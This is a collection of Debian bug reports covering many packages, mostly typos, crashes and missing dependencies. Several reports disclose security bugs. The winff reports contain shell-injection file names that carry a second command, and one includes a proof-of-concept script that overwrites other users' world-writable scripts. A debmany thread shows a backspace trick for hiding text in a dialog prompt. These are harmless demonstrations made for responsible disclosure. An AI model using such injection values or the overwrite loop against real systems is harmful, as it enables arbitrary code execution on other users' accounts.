Bug#1071939: taskwarrior: Naming conflict with go-task task tool
Control: forwarded -1 https://github.com/GothenburgBitFactory/taskwarrior/issues/3463 FWIW, go-task is not in Debian, but it's been ITP-ed: #1032658 -- Jakub Wilk
Bug#1032658: ITP: go-task -- A task runner / simpler Make alternative written in Go
* Mark E. Fuller , 2023-03-10 17:30: * URL : https://github.com/go-task/task The executable name is "task", but this name is already taken by taskwarrior; see bug #1071939. -- Jakub Wilk
Bug#1072297: lastlog(8) man page: stray XML markup
Package: login Version: 1:4.13+dfsg1-1+b1 Severity: minor I stumbled upon this: $ man lastlog.8 | grep -w term Having high UIDs can create problems when handling the /var/log/lastlog with external tools. Although the I suppose this XML markup shouldn't be there. -- Jakub Wilk
Bug#1068017: Y2038-safe replacements for utmp/wtmp and lastlog
* Jun MO , 2024-05-31 01:05: And something "off topic". I find there is a char __glibc_reserved[20] variable in the struct utmp, which is commented as "Reserved for future use". Just a brainstorm, if this variable is not currently used, maybe it can be used to solve the Y2038 problem for wtmp? Or, more easily, you could treat the timestamp as unsigned int: https://sourceware.org/cgit/glibc/commit/?id=5361ad3910c257bc "Architectures which use a 32-bit seconds-since-epoch field in struct lastlog, struct utmp, struct utmpx (such as i386, powerpc64le, rv32, rv64, x86-64) switched from a signed to an unsigned type for that field. This allows these fields to store timestamps beyond the year 2038, until the year 2106. Please note that applications are still expected to migrate off the interfaces declared in and (except for login_tty) due to locking and session management problems." -- Jakub Wilk
Bug#1071493: multiplex on bookworm: TypeError: 'multiple' is not valid with 'is_flag', use 'count'
Package: multiplex Version: 0.6.0-1 I installed multiplex on a bookworm system, but it doesn't work: $ mp --help Traceback (most recent call last): File "/usr/bin/mp", line 5, in from multiplex.main import main File "/usr/lib/python3/dist-packages/multiplex/main.py", line 89, in @click.option("--wait/--no-wait", "-w/-W", multiple=True, default=None) ^^ File "/usr/lib/python3/dist-packages/click/decorators.py", line 308, in decorator _param_memo(f, OptionClass(param_decls, **option_attrs)) File "/usr/lib/python3/dist-packages/click/core.py", line 2584, in __init__ raise TypeError("'multiple' is not valid with 'is_flag', use 'count'.") TypeError: 'multiple' is not valid with 'is_flag', use 'count'. It looks like support for multiple= with flags was added upstream in 8.1.4[*], but bookworm has only 8.1.3. Please add an appropriate versioned dependency to the package. [*] https://github.com/pallets/click/commit/b36e3ede781b388a -- System Information: Versions of packages multiplex depends on: ii python3-multiplex 0.6.0-1 ii python33.11.2-1+b1 -- Jakub Wilk
Bug#1071188: flite: bad formatting of man page references
Package: flite Version: 2.2-5 Severity: minor Tags: patch -- Jakub Wilk From: Jakub Wilk Date: Wed, 15 May 2024 17:37:34 +0200 Subject: [PATCH] Fix formatting of man page references --- debian/flite.1 | 4 +++- debian/flite_time.1 | 3 ++- debian/t2p.1| 4 +++- 3 files changed, 8 insertions(+), 3 deletions(-) diff --git a/debian/flite.1 b/debian/flite.1 index c771ced..5f63801 100644 --- a/debian/flite.1 +++ b/debian/flite.1 @@ -61,3 +61,5 @@ Verbose output. .SH SEE ALSO -.BR flite_time (1), " " t2p (1), " " festival (1) +.BR flite_time (1), +.BR t2p (1), +.BR festival (1) .SH AUTHOR diff --git a/debian/flite_time.1 b/debian/flite_time.1 index 656768c..13beb3c 100644 --- a/debian/flite_time.1 +++ b/debian/flite_time.1 @@ -20,3 +20,4 @@ Announce the current time. .SH SEE ALSO -.BR flite (1), " " festival (1) +.BR flite (1), +.BR festival (1) .SH AUTHOR diff --git a/debian/t2p.1 b/debian/t2p.1 index f400398..f4da1e1 100644 --- a/debian/t2p.1 +++ b/debian/t2p.1 @@ -15,3 +15,5 @@ No options. .SH SEE ALSO -.BR flite (1), " " flite_time (1), " " festival (1) +.BR flite (1), +.BR flite_time (1), +.BR festival (1) .SH AUTHOR -- 2.39.2
Bug#1071186: units --round: null pointer dereference
Package: units Version: 2.22-2 I've run into this: $ units --round 0.1s hms Segmentation fault GDB says it's a null pointer dereference: Program received signal SIGSEGV, Segmentation fault. 0x56563973 in showunitlist (havestr=0xd9d3 "0.1s", have=0x565722c0 , wantstr=) at ./units.c:5577 5577if (isdecimal(*lastunitstr)) (gdb) print lastunitstr $1 = 0x0 (gdb) bt #0 0x56563973 in showunitlist (havestr=0xd9d3 "0.1s", have=0x565722c0 , wantstr=) at ./units.c:5577 #1 0x565580a5 in main (argc=4, argv=0xd7e4) at ./units.c:6235 -- System Information: Architecture: i386 Versions of packages units depends on: ii libc6 2.36-9+deb12u7 ii libreadline8 8.2-1.3 Versions of packages units recommends: ii python3 3.11.2-1+b1 ii python3-requests 2.28.1+dfsg-1 -- Jakub Wilk
Bug#755434: pmount: please support exfat filesystem (via fuse)
* Vincent Danjean , 2024-05-04 23:56: ++{ "exfat", "nosuid,nodev,user", 1, "077", ",iocharset=%s",",fmask=%04o,dmask=%04o"}, Thanks, that does the trick for me. :) -- Jakub Wilk
Bug#755434: pmount: please support exfat filesystem (via fuse)
* Vincent Danjean , 2016-12-25 23:36: ++{ "exfat", "nosuid,nodev,user,quiet,nonempty", 1, "077", ",iocharset=%s",",fmask=%04o,dmask=%04o"}, This doesn't work for me. In dmesg I see: exfat: Unknown parameter 'quiet' -- Jakub Wilk
Bug#1069053: toilet man page: @PACKAGE_VERSION@
Package: toilet Version: 0.3-1.4 There's unexpanded @PACKAGE_VERSION@ in the man page: $ man toilet | tail -n1 libcaca @PACKAGE_VERSION@ 2006‐11‐10 toilet(1) -- System Information: Architecture: i386 -- Jakub Wilk
Bug#901071: Looks for a file named "-" in the current directory
* Josh Triplett , 2018-06-08 09:51: When invoked with stdin from a pipe, less looks for a file named "-" in the current directory. This was fixed upstream in v509: https://github.com/gwsw/less/commit/2195072f4676dc84 But a similar bug was reintroduced in v546: https://github.com/gwsw/less/commit/128c1dfe9d01ca7c https://github.com/gwsw/less/issues/289 It was finally fixed upstream in v616. -- Jakub Wilk
Bug#1068471: winff: shell injection
Package: winff Version: 1.6.3+dfsg-2 Tags: security As a follow-up to #1053373, WinFF still doesn't correctly escape filenames it passes to shell. To reproduce, try converting the file created by this command: touch '\"; cowsay pwned >&2 #.mp3' -- System Information: Architecture: i386 Versions of packages winff depends on: ii winff-qt 1.6.3+dfsg-2 -- Jakub Wilk
Bug#1068247: apt-transport-tor: add security-debug mirror to README
Package: apt-transport-tor Version: 0.5 Please add * security-debug.backend.mirrors.debian.org tor+http://i3hhdhcoozin2qyb5yhhufszgvhz6m2zfy6n6len2gjmetvbnnxcenyd.onion/ to README.md. -- Jakub Wilk
Bug#1067454: presentty: bad domain in Homepage and d/copyright
Source: presentty Version: 0.2.1-1.1 The Homepage field in debian/control and the Source field debian/copyright point to <http://git.inaugust.org/cgit/presentty/>, but there's no such domain. According to README.rst, it should be s/org/com/. -- Jakub Wilk
Bug#1067172: ruff: E999 SyntaxError: Got unexpected unicode
Package: ruff Version: 0.0.291+dfsg1-3 Tags: fixed-upstream ruff can't parse some \N{} sequences correctly, e.g.: $ cat stx.py print(ascii('\N{STX}')) $ python3 stx.py '\x02' $ ruff check stx.py error: Failed to parse stx.py:1:17: Got unexpected unicode stx.py:1:17: E999 SyntaxError: Got unexpected unicode Found 1 error. As far as I can see, it's already fixed upstream; I can't reproduce it with upstream ruff 0.3.3. -- System Information: Architecture: amd64 Versions of packages ruff depends on: ii libc6 2.36-9+deb12u4 ii libgcc-s1 12.2.0-14 -- Jakub Wilk print(ascii('\N{STX}'))
Bug#1066819: dput manpage: missing space between "-S," and "--unset"
Source: dput-ng Version: 1.39 Severity: minor Tags: patch -- Jakub Wilk From ac7204149aa6538ff02413222e0f438374a24d41 Mon Sep 17 00:00:00 2001 From: Jakub Wilk Date: Mon, 11 Mar 2024 10:36:50 +0100 Subject: [PATCH] dput manpage: add missing space --- docs/man/dput.1.man | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/man/dput.1.man b/docs/man/dput.1.man index a627a9c..c7bf898 100644 --- a/docs/man/dput.1.man +++ b/docs/man/dput.1.man @@ -113,7 +113,7 @@ OPTIONS connection is set-up (for example logging in through the FTP or SFTP protocol) and tested for its functionality. -*-S,--unset*=OVERRIDE:: +*-S, --unset*=OVERRIDE:: Override the configured profile key by unsetting its value. See *-O* for a full explanation of the behavior. -- 2.39.2
Bug#1065563: salsa: typo "branch as no origin"
Package: devscripts Version: 2.23.7 Severity: minor Tags: patch -- Jakub Wilk diff --git a/lib/Devscripts/Salsa/merge_request.pm b/lib/Devscripts/Salsa/merge_request.pm index 89152aa9..7682bb52 100644 --- a/lib/Devscripts/Salsa/merge_request.pm +++ b/lib/Devscripts/Salsa/merge_request.pm @@ -47,3 +47,3 @@ sub merge_request { ds_warn - "Current branch as no origin or isn't pushed, aborting"; + "Current branch has no origin or isn't pushed, aborting"; return 1;
Bug#1065561: console-setup: typos in documentation
Source: console-setup Version: 1.226 Severity: minor Tags: patch -- Jakub Wilk diff --git a/README.legacyfonts b/README.legacyfonts index a707fcc..2078725 100644 --- a/README.legacyfonts +++ b/README.legacyfonts @@ -4,3 +4,3 @@ LEGACY FONTS: CONVERSION FROM PSF TO BDF -The traditional font collection for Linux consolle was a big mess. +The traditional font collection for Linux console was a big mess. There were many different fonts and nobody in the world knew the exact @@ -18,4 +18,4 @@ generated for a group of fonts that share common typeface. Console fonts that didn't have embedded Unicode table were simply ignored. -The fonts LatArCyrHeb* were also ignored - partialy due to technical -reasons and partialy because the other BDF fonts are better source for +The fonts LatArCyrHeb* were also ignored - partially due to technical +reasons and partially because the other BDF fonts are better source for making Unicode console fonts. @@ -43,3 +43,3 @@ For example Greek-vga14.psf is the legacy font for Greek code set and size 14. The list of BDF fonts that is used to produce -Greek-vga14.psf was determined as folows. +Greek-vga14.psf was determined as follows. diff --git a/doc/console-setup.html/ch3.html b/doc/console-setup.html/ch3.html index c2d3a1f..bc74c33 100644 --- a/doc/console-setup.html/ch3.html +++ b/doc/console-setup.html/ch3.html @@ -64,4 +64,4 @@ for a group of fonts that share common typeface. Console fonts that didn't have embedded Unicode table were simply ignored. The fonts -LatArCyrHeb* were also ignored - partialy due to technical reasons -and partialy because the other BDF fonts are better source for making Unicode +LatArCyrHeb* were also ignored - partially due to technical reasons +and partially because the other BDF fonts are better source for making Unicode console fonts. @@ -148,3 +148,3 @@ fonts. This font is named after the scheme size 14. The list of BDF fonts that is used to produce Greek-vga14.psf was -determined as folows. +determined as follows. diff --git a/doc/console-setup.sgml b/doc/console-setup.sgml index 46e16a6..54f7fdf 100644 --- a/doc/console-setup.sgml +++ b/doc/console-setup.sgml @@ -388,3 +388,3 @@ Console fonts that didn't have embedded Unicode table were simply ignored. The fonts LatArCyrHeb* were also ignored - -partialy due to technical reasons and partialy because the other BDF +partially due to technical reasons and partially because the other BDF fonts are better source for making Unicode console fonts. @@ -465,3 +465,3 @@ from the legacy fonts. This font is named after the scheme set and size 14. The list of BDF fonts that is used to produce -Greek-vga14.psf was determined as folows. +Greek-vga14.psf was determined as follows.
Bug#1065508: python3-markdown-it should recommend or suggest python3-linkify-it
Package: python3-markdown-it Version: 2.1.0-5 Please add python3-linkify-it to Recommends or Suggests, as it's needed for some functionality: >>> from markdown_it import MarkdownIt >>> md = MarkdownIt('gfm-like') >>> md.parse('foo') Traceback (most recent call last): File "", line 1, in File "/usr/lib/python3/dist-packages/markdown_it/main.py", line 252, in parse self.core.process(state) File "/usr/lib/python3/dist-packages/markdown_it/parser_core.py", line 32, in process rule(state) File "/usr/lib/python3/dist-packages/markdown_it/rules_core/linkify.py", line 30, in linkify raise ModuleNotFoundError("Linkify enabled but not installed.") ModuleNotFoundError: Linkify enabled but not installed. -- System Information: Architecture: i386 Versions of packages python3-markdown-it depends on: ii python3-mdurl 0.1.2-1 ii python3-typing-extensions 4.4.0-1 ii python33.11.2-1+b1 -- Jakub Wilk
Bug#1065488: torbrowser-launcher should recommend libasound2
Package: torbrowser-launcher Version: 0.3.7-1 Tor Browser doesn't start if libasound2 is not installed: $ ~/.local/share/torbrowser/tbb/x86_64/tor-browser/Browser/start-tor-browser --verbose XPCOMGlueLoad error for file /home/jwilk/.local/share/torbrowser/tbb/x86_64/tor-browser/Browser/libxul.so: libasound.so.2: cannot open shared object file: No such file or directory Couldn't load XPCOM. Please add libasound2 to Recommends. -- Jakub Wilk
Bug#1065418: dglob man page: typo "de" → "the"
Package: debian-goodies Version: 0.88.1 Severity: minor Tags: patch -- Jakub Wilk diff --git a/dglob.pod b/dglob.pod index 6a483b3..e304b21 100644 --- a/dglob.pod +++ b/dglob.pod @@ -24,3 +24,3 @@ this behavior (see L<"OPTIONS">). If you use dglob with the B<-f> option, all files in the matched packages -are listed instead of their names. If you do not use de B<-a> switch, +are listed instead of their names. If you do not use the B<-a> switch, only existing, plain (i.e. no symlinks, directories or other special ones)
Bug#873376: input-utils: events and other items are no longer shown as clear text
Control: tags -1 + fixed-upstream This is easiest to reproduce with input-events(1). You get a bunch of nulls and question marks: # input-events -t 1 0 /dev/input/event0 bustype : BUS_I8042 vendor : 0x1 product : 0x1 version : 43841 name: "AT Translated Set 2 keyboard" phys: "isa0060/serio0/input0" bits ev : (null) (null) (null) (null) (null) waiting for events 09:06:41.937125: (null) ??? 28 09:06:41.937125: (null) ??? (0x1c) released 09:06:41.937125: (null) code=0 value=0 timeout, quitting ... instead of symbolic constants: # input-events -t 1 0 /dev/input/event0 bustype : BUS_I8042 vendor : 0x1 product : 0x1 version : 43841 name: "AT Translated Set 2 keyboard" phys: "isa0060/serio0/input0" bits ev : EV_SYN EV_KEY EV_MSC EV_LED EV_REP waiting for events 09:12:04.424055: EV_MSC MSC_SCAN 28 09:12:04.424055: EV_KEY KEY_ENTER (0x1c) released 09:12:04.424055: EV_SYN code=0 value=0 timeout, quitting Upstream fixes: https://git.kraxel.org/cgit/input/commit/?id=c3f5e30069efd2d645121652f1eb63cdcb725194 https://git.kraxel.org/cgit/input/commit/?id=fd1bab80e5f9e514facce49c1a462c04ed9df991 -- Jakub Wilk
Bug#1064069: python3-looseversion: bogus package description
Package: python3-looseversion Version: 1.3.0-1 The package description is completely wrong: $ apt-cache show python3-looseversion | grep-dctrl -s Description-en '' Description-en: Python module for simple PAM authentications (Python 3) Provide an authenticate() function that will allow the caller to authenticate a user against the Pluggable Authentication Modules (PAM) on the system. . The module pam.py is a single file, implemented using ctypes, so no compilation is necessary. This package provides the pam.py module for Python 3. -- Jakub Wilk
Bug#1063857: github-backup: commit messages don't end with newline
* Jakub Wilk , 2024-02-13 18:00: Commit messages created by github-backup don't end with newline ... which breaks git-log a bit: #1063859 "git: commit msg without trailing \n breaks 'git log --grep'ing for notes" -- Jakub Wilk
Bug#1063859: git: commit msg without trailing \n breaks "git log --grep"ing for notes
Package: git Version: 1:2.39.2-1.1 Let's create a commit with a message that doesn't end with newline¹, and attach a note to it: $ commit=$(printf 'foo' | git commit-tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904) $ git notes add -m bar $commit $ git log $commit --grep bar commit e0e2391bad1644f1dd580c0d5d6c5b58addf2870 Author: Jakub Wilk Date: 2024-02-13 18:00:51 +0100 foo Notes: bar So far so good, but if you anchor the regex, the commit can no longer be found: $ git log $commit --grep ^bar [nothing] Apparently that's because git concatenates the commit message and the note without inserting newline between them: $ git log $commit --grep ^foobar commit e0e2391bad1644f1dd580c0d5d6c5b58addf2870 Author: Jakub Wilk Date: 2024-02-13 18:00:51 +0100 foo Notes: bar ¹ See also bug #1063857 "github-backup: commit messages don't end with newline". -- System Information: Architecture: i386 Versions of packages git depends on: ii libc62.36-9+deb12u4 ii libcurl3-gnutls 7.88.1-10+deb12u5 ii libexpat12.5.0-1 ii libpcre2-8-0 10.42-1 ii zlib1g 1:1.2.13.dfsg-1 ii perl 5.36.0-7+deb12u1 ii liberror-perl0.17029-2 ii git-man 1:2.39.2-1.1 -- Jakub Wilk
Bug#1063857: github-backup: commit messages don't end with newline
Package: github-backup Version: 1.20200721-2+b1 Commit messages created by github-backup don't end with newline: $ git clone -q https://github.com/jwilk/cowproxy $ cd cowproxy $ github-backup --no-forks Gathering metadata for https://github.com/jwilk/cowproxy.git ... $ git cat-file commit github && echo '<-- no newline here' tree e4fe2ef1f08a9145c7234e0fab086a9c12781eab parent 9d6d276c144804c026ac35195b6adddb764c4a35 author Jakub Wilk 1707842905 +0100 committer Jakub Wilk 1707842905 +0100 github-backup<-- no newline here This is unlike commit messages created by "git commit": $ git cat-file commit HEAD && echo '^-- yay' tree 91b21d2098618e30ec4c87eef0e3ed505f281f53 parent 6eae506db2f48cb85ffd959e2cb2385a0a87e948 author Jakub Wilk 1706350373 +0100 committer Jakub Wilk 1706350373 +0100 CI: upgrade actions/cache to v4. ^-- yay -- System Information: Architecture: i386 Versions of packages github-backup depends on: ii libc6 2.36-9+deb12u4 ii libdouble-conversion3 3.2.1-1 ii libffi83.4.4-1 ii libgmp10 2:6.2.1+dfsg1-1.1 ii libstdc++6 12.2.0-14 ii zlib1g 1:1.2.13.dfsg-1 ii git 1:2.39.2-1.1 -- Jakub Wilk
Bug#1063834: displayfont man page: "showfont (no such manpage?)"
Package: console-cyrillic Version: 0.9-17.2 Severity: minor The SEE ALSO section of the displayfont(1) manual page says: showfont (no such manpage?) But it does exist: $ dpkg -S showfont.1 x11-xfs-utils: /usr/share/man/man1/showfont.1.gz -- Jakub Wilk
Bug#1063761: xfonts-terminus: no Homepage field
Source: xfonts-terminus Version: 4.48-3.1 Severity: minor Please add Homepage: https://terminus-font.sourceforge.net/ to debian/control. -- Jakub Wilk
Bug#1063760: dumppsf can't dump some fonts
Package: console-cyrillic Version: 0.9-17.2 dumppsf fails to dump some fonts, e.g.: $ zcat /usr/share/consolefonts/Uni2-TerminusBold14.psf.gz > tmp.psf $ dumppsf tmp.psf PSF mode 3, charsize=14 Read 9776bytes of unicode table -- System Information: Architecture: i386 Versions of packages console-cyrillic depends on: ii perl-base 5.36.0-7+deb12u1 ii debconf 1.5.82 ii kbd 2.5.1-1+b1 Versions of packages console-cyrillic suggests: ii perl5.36.0-7+deb12u1 ii console-setup 1.221 -- Jakub Wilk
Bug#1063335: RFP: chafa.py -- Python bindings for Chafa
Package: wnpp Severity: wishlist * Package name: chafa.py Version : 1.1.2 Upstream Author : Erica Ferrua Edwardsdóttir * URL : https://chafapy.mage.black/ * License : LGPL-3.0 Programming Lang: Python Description : Python bindings for Chafa -- Jakub Wilk
Bug#1063237: tmux: crash when pasting into dead pane
Package: tmux Version: 3.3a-3 I've run into this: $ tmux set-option -g remain-on-exit \; new-session -d false $ tmux set-buffer x \; paste-buffer server exited unexpectedly In dmesg I see: tmux: server[4496]: segfault at 8c ip f7ee162b sp ffb537a4 error 4 in libevent_core-2.1.so.7.0.1[f7ed9000+2] likely on CPU 1 (core 1, socket 0) Backtrace: #0 0xf7ea662b in bufferevent_write (bufev=0x0, data=0x5745f730, size=1) at ./bufferevent.c:454 #1 0x5659d0a6 in cmd_paste_buffer_exec (self=0x57442f20, item=0x574751d0) at ./cmd-paste-buffer.c:98 #2 0x5659e892 in cmdq_fire_command (item=0x574751d0) at ./cmd-queue.c:647 #3 cmdq_next (c=0x57480b00) at ./cmd-queue.c:763 #4 0x565ee113 in server_loop () at ./server.c:270 #5 0x565da562 in proc_loop (tp=0x57438580, loopcb=0x565ee0b0 ) at ./proc.c:222 #6 0x565ee96c in server_start (client=0x57437d00, flags=402718720, base=0x57437600, lockfd=5, lockfile=0x57437950 "") at ./server.c:251 #7 0x5658e72b in client_connect (flags=, path=0x57437500 "/tmp/tmux-1000/default", base=0x57437600) at ./client.c:164 #8 client_main (base=0x57437600, argc=7, argv=0xfffed398, flags=, feat=0) at ./client.c:287 #9 0x56589432 in main (argc=7, argv=) at ./tmux.c:519 -- System Information: Architecture: i386 Versions of packages tmux depends on: ii libc62.36-9+deb12u4 ii libevent-core-2.1-7 2.1.12-stable-8 ii libtinfo66.4-4 ii libutempter0 1.2.1-3 -- Jakub Wilk
Bug#1062774: xdotool: "mousemove --sync" can take 15s
Package: xdotool Version: 1:3.20160805.1-5 "xdotool mousemove --sync" takes over 15 seconds if the mouse cursor is already in the right location: $ for i in 1 2; do time xdotool mousemove --sync 37 42; done real 0m0.007s user 0m0.003s sys 0m0.003s real 0m15.236s user 0m0.025s sys 0m0.030s -- System Information: Architecture: i386 Versions of packages xdotool depends on: ii libc6 2.36-9+deb12u4 ii libx11-6 2:1.8.4-2+deb12u2 ii libxdo3 1:3.20160805.1-5 -- Jakub Wilk
Bug#1061780: python3-argcomplete: zsh support not in description
Package: python3-argcomplete Version: 3.1.4-1 The package description mentions only bash, but zsh is supported too since v3.0. -- Jakub Wilk
Bug#1031267: debmany: shell injection
Possible alternative approach: if the path contains any suspicious characters, create a temporary symlink with a safe name, and pass that symlink to eval instead. I'm not sure it's a _better_ approach, but maybe worth considering. (I stole the idea from run-mailcap(1).) * Axel Beckert , 2023-02-19 05:47: So I came up with the following fix which uses command instead of eval, and bash pattern substitution to replace %s with the file name instead letting printf inside an $() doing the substitution: I fear that someone might be using -m or -o with shell constructs that this change will break. Maybe it's a good tradeoff, but it should be documented. + cmdarr=($@) You should disable glob expansion here. + for i in ${!cmdarr[@]}; do +cmdarr[$i]="${cmdarr[$i]/\%s/$replacement}" + done You should either replace all %s occurrences, or just the first one. The above code sits oddly in the middle: it replaces the first occurrence in every argument. - eval $(printf "gzip -dc $PWD/$return | $othercmdline") + gzip -dc "$PWD/$return" | replace_percent_s_and_execute '-' "$othercmdline" Passing "-" instead of skipping the argument is another potential incompatibility. -- Jakub Wilk
Bug#1061643: debmany -x: can't show compressed files in /usr/share/doc
Package: debian-goodies Version: 0.88.1 Severity: minor If you use the -x option, debmany cannot show compressed files in /usr/share/doc: it tries to run xdg-run without arguments, which doesn't work. I guess -k might have the same problem. -- Jakub Wilk
Bug#1061641: debmany: -k, -x underdocumented
Package: debian-goodies Version: 0.88.1 Severity: minor The man page says -x is shorthand for "-m 'xdg-open man:%s'", but in reality is also sets viewer for other files. The -k option has the same issue. -- Jakub Wilk
Bug#1061586: ~/.winff/*.sh are world-writable
Package: winff Version: 1.5.5-9 Tags: security patch As it was noted in <https://github.com/WinFF/winff/issues/242>, WinFF changes permissions of ~/.winff/*.sh files to 0777, which is world-writable! Assuming default permissions of the home directory and the .winff subdir, this can be exploited by local users to execute arbitrary code with the context of the user running WinFF. I've attached a proof-of-concept exploit. (It's not 100% reliable.) I've also attached an untested patch. -- Jakub Wilk #!/bin/sh while true do for file in /home/*/.winff/*.sh do echo 'cowsay pwned >&2; sleep inf' | tee "$file" > /dev/null done done diff --git a/winff/unit1.pas b/winff/unit1.pas index 71689a6..6a77b02 100644 --- a/winff/unit1.pas +++ b/winff/unit1.pas @@ -1354,7 +1354,7 @@ begin script.SaveToFile(presetspath+batfile); {$ifdef unix} - fpchmod(presetspath + batfile,&777); + fpchmod(presetspath + batfile,&700); {$endif} scriptprocess.ShowWindow := swoNone; @@ -2494,7 +2494,7 @@ begin // get setup begin {$ifdef unix} - fpchmod(presetspath + batfile,&777); + fpchmod(presetspath + batfile,&700); {$endif} // do it
Bug#1053373: winff: shell injection
Control: found -1 1.6.2+dfsg-2 The fix is insufficient. To reproduce, try converting the file created by this command: touch '`cowsay pwned >&2; sleep inf`.mp3' Single-quoted strings are better suited for shell-escaping, because the only character to care of is the single quote itself. That is, the whole escaping procedure could look like this: 1) Replace every ' character with: '\'' 2) Add single quotes around the whole thing. -- Jakub Wilk
Bug#1061303: json2bson: AttributeError: 'NoneType' object has no attribute 'encode'
Package: reserialize Version: 20220929-2 Severity: minor I ran into this: $ echo '{}' | json2bson > /dev/null Traceback (most recent call last): File "/usr/bin/json2bson", line 88, in fh_dumpers[otype](data, ofh) File "/usr/bin/json2bson", line 39, in "bson": lambda arg, fh: fh.write(bson.encode(arg)), ^^^ AttributeError: 'NoneType' object has no attribute 'encode' Apparently that's because I didn't have python3-bson installed, but the error message didn't give me any clue about what's wrong. -- Jakub Wilk
Bug#1031267: debmany: shell injection
The example viewer in the man page also uses eval: #!/bin/dash read -p "program to use: " pgm eval $pgm "$1" Please fix it too. -- Jakub Wilk
Bug#769748: gpm cannot distinguish between Russian and English "a" if a font is terminus unicode bold with console-cyrillic
* Askar Safin , 2014-11-16 07:06: Steps to reproduce: * Install gpm and console-cyrillic * Configure console-cyrillic and choose terminus unicode bold as a font * Restart console-cyrillic * Type Russian letters "а" and "о" (which look exactly same as English "a" and "o") * Copy them to clipboard using gpm * Paste What I get: * I get English "a" and "o" What I expected to get: * Russian "а" and "о" This is not a gpm bug. Gpm is not deeply involved in the copying and pasting operation: it just tells the kernels what part of screen to copy and when to paste. What your seeing is caused by limitations of the Linux kernel and a font design choice: 1. The kernel limits the number of glyphs in the font to 256 (or 512 if you're OK with reduced number of available colors). 2. To work around this limit, and to fit as many characters as possible into a single font, the Terminus fonts reuses the same glyphs for characters that look the same (or almost the same), such as Latin "a" and Cyrillic "а". 3. The kernel didn't track which Unicode _characters_ appeared on screen, only which _glyphs_ did. (So the distinction between Latin "a" and Cyrillic "а" got lost.) Fortunately, the last point is partially fixed since v4.19: if you read from a /dev/vcsuN device, the kernel will start to keep track of Unicode characters on screen, and they should be properly copy-pastable. See the following kernel commits: https://git.kernel.org/linus/9bfdc2611d417be453c3deb7a7ef2ffc718febfa https://git.kernel.org/linus/d21b0be246bf3bbf569e6e239f56abb529c7154e -- Jakub Wilk
Bug#728752: [getbuildlog] get compressed buildlogs
* James McCoy , 2013-11-20 00:58: On Mon, Nov 04, 2013 at 10:12:45PM -0300, Lisandro Damián Nicanor Pérez Meyer wrote: Since gcc became mor everbose on it builds it's not strange to find enourmous build logs (200+MB). It would be really cool if getbuildlog could get the compressed buildlog to save bandwith. You may want to give pkgkde-getbuildlogs (from pkg-kde-tools) a try: it requests compressed responses and (IMHO) has a nicer API. As far as I know, there isn't a "compressed buildlog" available. We could change our wget call to specify "Accept-Encoding: deflate, gzip" Yup, that should be a matter of passing --compress=auto to wget. but that relies on the server being configured to offer compression. buildd.debian.org supports it. :) That said, it seems it compresses the logs on the fly, which slows down things significantly. For example: $ url='https://buildd.debian.org/status/fetch.php?pkg=gcc-12=i386=12.3.0-13=1702656593=1' $ wget "$url" -O /dev/null --2024-01-17 13:53:58-- https://buildd.debian.org/status/fetch.php?pkg=gcc-12=i386=12.3.0-13=1702656593=1 Resolving buildd.debian.org (buildd.debian.org)... 2607:f8f0:614:1::1274:60, 209.87.16.60 Connecting to buildd.debian.org (buildd.debian.org)|2607:f8f0:614:1::1274:60|:443... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/plain] Saving to: ‘/dev/null’ /dev/null [ <=> ] 48.09M 15.6MB/sin 3.4s 2024-01-17 13:54:02 (14.2 MB/s) - ‘/dev/null’ saved [50423419] $ wget --compress=auto "$url" -O /dev/null --2024-01-17 13:54:08-- https://buildd.debian.org/status/fetch.php?pkg=gcc-12=i386=12.3.0-13=1702656593=1 Resolving buildd.debian.org (buildd.debian.org)... 2607:f8f0:614:1::1274:60, 209.87.16.60 Connecting to buildd.debian.org (buildd.debian.org)|2607:f8f0:614:1::1274:60|:443... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/plain] Saving to: ‘/dev/null’ /dev/null [ <=> ] 2.70M 1.05MB/sin 2.6s 2024-01-17 13:54:12 (1.05 MB/s) - ‘/dev/null’ saved [50423419] The compressed log was ~18 times smaller, but the download took only 25% less time. It's not clear --compress=auto is always going be a net benefit. -- Jakub Wilk
Bug#1031267: debmany: shell injection
* Axel Beckert , 2023-02-14 15:53: the exploit code is always shown to the user before the exploit actually runs Sneakier exploits might be possible, though. For example, for dialog(1), the backspace character can be used to hide stuff, e.g: H=$(printf '\b') dialog --title '' --menu '' 10 60 20 "foo$H$H$H""bar" bar (shows "bar" but not "foo") -- Jakub Wilk
Bug#1060685: jbig2dec: typo in debian/copyright
Source: jbig2dec Version: 0.19-3 Severity: minor Please do s/pubic/public/ in debian/copyright. -- Jakub Wilk
Bug#1057261: RFP: consent-o-matic -- browser extension to automatically fill out cookie popups
Package: wnpp Severity: wishlist * Package name: consent-o-matic Version : 1.0.12 Upstream Contact: Centre for Advanced Visualisation and Interaction * URL : https://github.com/cavi-au/Consent-O-Matic * License : Expat Programming Lang: JavaScript Description : browser extension to automatically fill out cookie popups -- Jakub Wilk
Bug#1053373: winff: shell injection
Package: winff Version: 1.5.5-9 Tags: security WinFF doesn't correctly escape filenames that it passes to shell. If the user is tricked to convert files with malicious names, this could result in execution of arbitrary code. To reproduce, try converting the file created by this command: touch '$(cowsay pwned >&2; sleep inf).mp3' -- Jakub Wilk
Bug#998326: hub: git protocol not supported anymore
git:// is also mentioned in the package description. Please fix that too. -- Jakub Wilk
Bug#1042525: localehelper: FTBFS with Perl 5.38: t/help.t failure
Control: tags 1 + fixed-upstream * Niko Tyni , 2023-07-29 21:19: # Failed test 'help message' # at t/help.t line 39. # got: 'given is deprecated at /<>/t/../localehelper line 153. # when is deprecated at /<>/t/../localehelper line 154. # when is deprecated at /<>/t/../localehelper line 159. # when is deprecated at /<>/t/../localehelper line 167. # when is deprecated at /<>/t/../localehelper line 171. Thanks for the bug report. I've fixed it upstream in 0.1.7. Commits to cherry-pick if need be: https://github.com/jwilk/localehelper/commit/af9dabda61314d79 https://github.com/jwilk/localehelper/commit/ef6ca54a5b570bda -- Jakub Wilk
Bug#1043469: fnt: insecure deb unpacking
